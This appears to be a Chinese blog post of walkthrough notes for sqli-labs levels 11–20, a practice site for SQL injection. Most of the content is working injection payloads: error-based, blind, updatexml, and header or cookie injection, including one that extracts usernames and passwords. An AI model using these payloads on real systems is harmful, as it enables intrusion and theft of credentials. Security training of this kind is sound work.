sqli-lab详解——做题笔记11-20

最新推荐文章于 2024-05-18 15:04:49 发布
最新推荐文章于 2024-05-18 15:04:49 发布
阅读量1k 收藏 1
点赞数
分类专栏: SQL注入 文章标签: SQL注入 sqli-lab 入门 习题
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Dream__Catcher/article/details/82981779
版权

这部分的题目都是通过POST方法注入
less-11 基于报错-单引号字符串
在user或者password栏中输入
1’ or 1=1 #
获取信息:
1’ or 1=1 LIMIT 2,1 #2可换成需要的数字
还可以用盲注的方法获得信息(后面补充)

less-12 基于报错-双引号字符串变式
在user或者password栏中输入
2") or 1=1 #

less-13 双注入-单引号字符串变式
在user或者password栏中输入

a') or 1=2 union select count(*),concat((select version()),floor(rand()*2)) as a from information_schema.tables group by a #

less-14 双注入-双引号字符串
(本题题目名称目录中应该是写错了)
在user或者password栏中输入

a" or 1=2 union select count(*),concat((select version()),floor(rand()*2)) as a from information_schema.tables group by a #

less-15 盲注-布尔型/时间-单引号
在user或者password栏中输入

1' or ascii(mid((select database()),1,1))>64 #布尔注入
1' or if(ascii(substr((select database()),1,1))<115,true,sleep(3)) # #时间盲注

less-16 盲注-布尔型/时间-双引号
在user或者password栏中输入(本题实际上是有括号的)

1") or ascii(mid((select database()),1,1))>64 #布尔注入
1") or if(ascii(substr((select database()),1,1))<115,true,sleep(3)) # #时间盲注

less-17 更新查询-基于报错-字符串
本题是输入用户名和要更改的密码。源代码中对username做了很多限制,所以要从password注入。已知用户名admin(能更改密码成功说明用户名存在)

方法一:双注入

 ' or (SELECT 1 FROM(select count(*),concat('*',(select database()),'*',floor(rand()*2)) as x from information_schema.tables group by x)as a) #

用户名admin要输,密码栏输入上面的代码。
对于dateup、delete和insert通常都是结合or的逻辑判断

方法二:updatexml()函数

uname=admin&passwd='  or updatexml(1,concat('~',(select database()),'~'),0)%23

原理是利用该函数的报错
获取数据:
但是这边却出现了You can’t specify target table ‘users’ for update in FROM clause错误

不能先select出同一表中的某些值,再update这个表(在同一语句中)。

也就是说将select出的结果再通过中间表select套一遍,这样就规避了错误,其实之前在子查询注入中也有用到此方法,同时,还要给多加的一重select赋一个别名

 '  or updatexml(1,concat('~',(select * from(select concat_ws(char(45),id,username,password) from users limit 0,1)as a),'~'),0)%23

方法三:盲注

less-18 包头注入-Uagent-基于报错
user-agent的输入没有过滤,且作为插入值用在了insert语句中,用bp修改user-agent值为

' or updatexml(1,concat(0x3a,database()),1))#

完成把XML报错注入

$  ' or updatexml(1,concat(0x3a,(select table_name from information_schema.tables where table_schema="security" limit 0,1)),1))#  //获取表名
$  ' or updatexml(1,concat(0x3a,(select column_name from information_schema.columns where table_name="user" limit 0,1)),1))#     //获取指定表字段名

less-19 包头注入-referer(来源)-基于报错
这次是修改referer字段,同理

' or updatexml(1,concat(0x3a,database()),1))#

less-20 Cookie注入-用户代理-基于报错
修改cookie字段构造SQL语句

uname=qwe' union select 1,user(),database()-- #

注意结果是显示在下面 id: XXX Password:XXX那部分

Dream__Catcher
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs 第5-6关总结
KOne28的博客
09-07 388
第5关 输入?id=1 以前四关的思路 单引号报错,双单引号正常,证明存在注入点 order by 3-- - 正常 order by 4-- - 报错,字段数为3 再用select 1, 2, 3 发现无回显点 所以第五关得用到报错注入 根据标题可以用到双重查询 ?id=1’ union SELECT null,count(*),concat((select database()),floor(rand()*2))as a from information_schema.tables group by
第三节 Sqli-lab环境搭建-01
09-15
Sqli-lab环境搭建-01 在本节中,我们将讨论如何搭建Sqli-lab环境,包括安装PhpStudy环境、火狐浏览器插件、Sqlmap和Sqli-Lab等工具。这些工具将帮助我们学习SQL注入漏洞检测和利用。 PhpStudy环境安装 PhpStudy是...
sqli-labs-----第11
wyzhxhn的博客
11-09 1764
基于错误的POST型单引号字符型注入
详细sqli-labs(1-20)通关讲解
最新发布
m0_57928318的博客
05-18 1386
获取数据库名时可以使用 left() 函数,这里使用 substr() 函数截取数据库名的每个字符,然后使用 ASCII() 函数判断这个字符的 ASCII 码值。我们可以看出,GET 方式和post 方式 的区别,GET方式 可以明显的 从 URL 中进行注入,POST可以在数据包中进行修改对应的字段来进行 SQL 注入。获取数据库名时,使用 LEFT() 函数进行穷举法的效率较低,使用 substr() 函数结合 ASCII() 函数进行判断可以使用二分法快速缩小范围。
Sql-labs 前 20 关 通过笔记
weixin_45619494的博客
10-06 441
输入:passwd=admin' and updatexml(1,concat(0x5e,(substr((select database()),1)),0x5e),1) --+直接用 十八关 payload:3',extractvalue(1,concat(0x7e,(select database()),0x7e))) #发现 用 passwd=admin' sleep(6) --+ ,没有延迟,时间盲注可能没用。修改 0x5e 之前 的数字 为 32,63,94,125,即可获得后续内容!
sqli-labs第二十关
m0_73248913的博客
02-16 445
sqlilabs第二十关cookie注入
sqli-lab(13)
weixin_30664615的博客
05-24 136
Double Injection- String- with twist(双注入 - 字符型 - 变形) 来进行我们的注入测试 直接闭合,用户名和密码输入“ ‘) or (‘1’) = (‘1%23 ” 双引号里面的语句,前面的单引号加括号和sql中的括号单引号闭合,后边的也闭合了,看图片: 一切都是对的,为什么还是登录失败? 因为username那儿变成空的了,所以前面随便加上一个用...
sqli-lab通关txt
07-22
在这个sqli-lab通关txt文件中,我们预计会找到一系列关于SQL注入攻击的实战教程,主要涵盖了从基础到进阶的10个不同阶段的练习。 SQL注入通常发生在Web应用中,当用户输入的数据没有被正确地过滤或转义,导致这些...
sqli-lab操作详解
07-12
本篇文章将详细讲解SQL注入漏洞以及如何在`sqli-lab`这个实践环境中进行操作。 一、SQL注入的理解 SQL注入的基本原理是利用程序对用户输入数据的不当处理,使得恶意SQL代码能够与服务器上的数据库交互。当Web应用未...
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
SQLI-LAB  的 实战记录(Less 11 - Less 20)
这块盾牌有待改良
07-15 4309
Less - 11 Error Based- String Less - 12 Error Based- Double quotes- String Less - 13 Double Injection- String- with twist
sqli-lab19关基于post的referer报错注入
qq_46527080的博客
12-18 424
知识点 referer: http请求头里,有一个referer首部,这个首部可以告知服务端,当前的请求的来源。 就是很直观的说,访问了一个页面,你来自哪里 extractvalue()函数 extractvalue() 函数是对XML文档进行查询的函数 其实就是相当于HTML文件中用 标签查找元素一样 语法:extractvalue(目标xml文档,xml路径) update是更新 extractvalue是查询 第十九关 sqlmap方法: 这里我们还是使用SQLMAP进行注入,将登录请求信息保存到1.
sql-lab 11~20总结(后续持续更新)内含18关火狐无法抓到本地包的解决方法
m0_62879498的博客
12-17 2743
十一题的传参方式变成了post传参 但注入方式差不多 判断注入点 ​ 'or 1=1 – q 判断字段数 ’or 1=1 order by 2 – q 判断回显点 ​ ’ union select 1,2-- q 查询相关内容 判断库名 ’ union select 1,database()-- q 判断表名 ’ union select 1,table_name from information_schema.tables where table_
sql-labs 11-20
m0_46143427的博客
02-03 761
Sql11-20 Less-11 首先在输入框里随便输入账号密码,可以看到URL里无任何变化,所以这关是POST传递了。 但是不管是怎么传递的,数据在传输到后台的处理是相同的,后台sql语句照样可以被我们修改。 我们先输账号为:admin'密码为:123可以看到 123被单引号括住,说明是单引号闭合型。 接下来输入账号为:admin'#,密码为:123可以看到,页面显示 正确进入,而且还有两个显...
SQLi-Labs通关笔记
Lethe's Blog
07-26 1930
Less-1 ?id=1' 单引号报错,存在注入 ?id=1' order by 4 %23'报错,存在三列 ?id=-1' union select 1,2,3%23 发现2和3的位置可以回显,于是进行注入 ?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where ta...
Sqli-labs学习SQL注入-Lesson 11-20总结
weixin_38116282的博客
09-25 378
LE11- 简单的POST注入 闭合 ' LE12-简单的POST注入 闭合 ") LE13-简单的POST注入 闭合 ')  测试的时候多用'  " 然后判断语句怎么写的 LE14- 简单的POST注入 闭合 " LE15- 没有报错提示 只能用盲注 就是利用真假                 例如
sqlilab学习打卡|手工注入|Less-1 to Less-10
spring!
03-28 1987
sqlilab学习打卡|手工注入|Less-1 to Less-10
通过sqli-labs学习sql注入——基础挑战之less1-10
热门推荐
giantbranch的专栏
05-02 5万+
欢迎光顾我的新博客:https://www.giantbranch.cn 本文链接:http://blog.csdn.net/u012763794/article/details/51207833 虽然sql注入接触过不少,其实也不太多,但是不系统,那就通过sqli-libs系统学习总结一下吧 注:第一个就说得详细一点,后面的有新知识才会说,所以第一个一定要看!!!如果第一个还有不明白的地方...
sqli-lab安装
09-05
要安装sqli-lab,您需要按照以下步骤进行操作: 1. 首先,确保您具有Web服务器环境。您可以使用Apache、Nginx或其他适合您的环境的Web服务器。 2. 下载sqli-lab的代码。您可以从GitHub存储库中获取它,链接:...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值